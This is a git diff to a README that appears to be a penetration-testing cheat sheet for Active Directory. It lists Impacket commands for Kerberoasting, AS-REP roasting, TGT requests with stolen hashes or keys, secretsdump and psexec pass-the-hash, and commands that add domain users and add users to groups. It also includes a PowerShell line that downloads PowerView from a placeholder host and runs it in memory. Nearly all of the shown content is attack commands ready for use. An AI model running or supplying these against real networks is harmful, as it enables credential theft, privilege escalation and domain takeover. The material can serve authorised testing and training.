Update README.md

README.md

@@ -670,16 +670,11 @@ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request {DOMAIN
 
 # ASREP ROAST
 python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN}/ -dc-ip {IP ADDRESS} -format john
-
 python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py {DOMAIN}/ -dc-ip {IP ADDRESS} -usersfile {USER.txt} -format john
 
-# Request the TGT with hash
+# Request the TGT with hash, AES key, or password
 python3 /usr/share/doc/python3-impacket/examples/getTGT.py {DOMAIN}/{USERNAME} -hashes {LM HASH}:{NTLM HASH}
-
-# Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
 python getTGT.py {DOMAIN}/{USERNAME} -aesKey {AES KEY}
-
-# Request the TGT with password
 python getTGT.py {DOMAIN}/{USERNAME}:{PASSWORD}
 
 # Bloodhound
@@ -693,6 +688,7 @@ net user {USERNAME} {PASSWORD} /add /domain
 # Add user to group
 net group "{GROUP}" {USERNAME} /add
 
+# Powerview example
 IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/PowerView.ps1")
 $pass = convertto-securestring '{PASSWORD}' -AsPlainText -Force
 $cred = New-Object System.Management.Automation.PSCredential('{DOMAIN}\{USERNAME}', $pass)
@@ -703,7 +699,7 @@ sudo python3 /usr/share/doc/python3-impacket/examples/secretsdump.py '{DOMAIN}/{
 
 # PSEXEC
 sudo python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes {HASH1:HASH2} {USERNAME}@{IP ADDRESS}
-
+sudo python3 /usr/share/doc/python3-impacket/examples/psexec.py {USERNAME}:{PASSWORD}@{IP ADDRESS}
 ```